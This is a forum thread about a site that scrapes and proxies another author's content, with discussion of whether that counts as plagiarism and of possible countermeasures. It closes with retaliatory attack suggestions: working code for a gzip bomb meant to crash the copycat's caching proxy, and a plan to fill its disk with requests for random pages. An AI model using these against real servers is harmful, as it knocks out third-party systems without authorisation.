In other words, nothing was stolen, but a mirror/proxy was set up.
In a way, that’s the same thing one pays Cloudflare for, what Google does with cached URLs, and what archive.org and the like do. I think some of the measures mentioned would therefore prevent that too.
And yes, reporting to their DNS and/or hosting provider is the right way to go. Of course, depending on their persistence, it’s whack-a-mole. In the end, one could download the whole website (just like your browser does) and upload it somewhere. On the topic of JS: an “attacker” could run a headless browser. That’s something some front-end frameworks do/did so their websites could be indexed by search engines.
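For illustration, a minimal headless-browser sketch (Puppeteer is just an assumption here; any headless browser works the same way) that fetches the fully rendered HTML exactly as a real visitor’s browser would:

    // Sketch only: scrape a fully rendered page with a headless browser.
    // Puppeteer and the target URL are assumptions for illustration.
    const puppeteer = require('puppeteer');

    (async () => {
      const browser = await puppeteer.launch();
      const page = await browser.newPage();
      await page.goto('https://good.com/', { waitUntil: 'networkidle0' });
      const html = await page.content(); // DOM after scripts have run
      console.log(html); // an attacker would store or re-upload this
      await browser.close();
    })();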
So whatever you put on the internet, people can download and re-upload, or proxy, in some form.
Insert obligatory “You wouldn’t steal a car” here
https://www.youtube.com/watch?v=HmZm8vNHBSU
The words “theft” and “steal” are inaccurate when duplication is essentially free and nobody lost their copy.
The correct word is probably impersonation. They are impersonating the author. In certain cases impersonation is indeed a crime.
I think the better word is plagiarism. They are not pretending to be the author (good.com); they are trying to be another, better-ranked, ad-filled website (proxy.com) that happens to have the same content (it’s just plagiarized).
Couldn’t you put a little script on every page that checks window.location.href and, if the domain is wrong, sets it to the corresponding URL at the proper domain?
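Something like this minimal sketch, assuming good.com is the legitimate domain as in the comment above:

    // Hypothetical canonical-domain check; good.com stands in for the real site.
    (function () {
      var canonical = 'good.com';
      if (window.location.hostname !== canonical) {
        // Rebuild the same URL on the proper domain, keeping path and query.
        window.location.href = 'https://' + canonical +
          window.location.pathname + window.location.search;
      }
    })();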
It’s also important to remember that they’re sanitizing the scraped page to remove all JavaScript tags; scripting won’t work here.
Sure, but some of the proxy / scrape methods are smart enough to rewrite your script as well.
@OP could fill the scraper’s server disk with junk by requesting randomly generated pages from the copy-cat website, each of which would get cached. There’s also the option of a gzip bomb (in PHP, or with nginx) that could maybe make the caching proxy crash.
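A rough sketch of the gzip-bomb idea in Node (the comment suggests PHP or nginx; Node is used here only to keep one language across these examples, and isScraper() is a hypothetical check you’d replace with the copy-cat’s actual IP or User-Agent):

    // Sketch: serve a pre-compressed gzip bomb to the suspected proxy.
    // Node stands in for the PHP/nginx setups mentioned above.
    const http = require('http');
    const zlib = require('zlib');

    // ~100 MB of zeros gzips down to roughly 100 KB; the caching proxy
    // pays the full decompressed size when it inflates the body.
    const bomb = zlib.gzipSync(Buffer.alloc(100 * 1024 * 1024));

    function isScraper(req) {
      // Hypothetical check: match the copy-cat's User-Agent or IP here.
      return /copycat-bot/i.test(req.headers['user-agent'] || '');
    }

    http.createServer((req, res) => {
      if (isScraper(req)) {
        res.writeHead(200, {
          'Content-Type': 'text/html',
          'Content-Encoding': 'gzip', // the proxy will decompress the bomb
        });
        res.end(bomb);
      } else {
        res.end('normal page');
      }
    }).listen(8080);

The random-page trick is even simpler: a loop requesting https://proxy.com/<random-id> paths, so every cache miss lands in the copy-cat’s cache as a new junk entry.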